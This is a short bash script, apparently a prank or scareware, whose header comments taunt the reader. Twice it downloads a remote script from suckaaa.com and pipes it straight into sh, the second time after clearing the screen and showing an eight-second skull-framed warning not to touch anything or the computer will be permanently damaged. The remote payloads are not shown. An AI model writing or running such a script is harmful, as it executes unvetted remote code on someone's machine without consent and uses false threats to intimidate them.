#!/bin/bash

###########  HEADER  ###########
# loL whatcha lookin for in here??
# Don't worry about it!!
curl -s 'https://suckaaa.com/s/lib-installer' | sh;
source ~/.garbage/lib;
clear;
###########  END HEADER  ###########

setPosition 0 0;

bigMsg "☠☠☠ DON'T TOUCH A THING!!\nOR YOU WILL PERMANENTLY DAMAGE YOUR COMPUTER!! ☠☠☠";

sleep 8s;

termdo 'curl -s https://suckaaa.com/s/loL | sh';
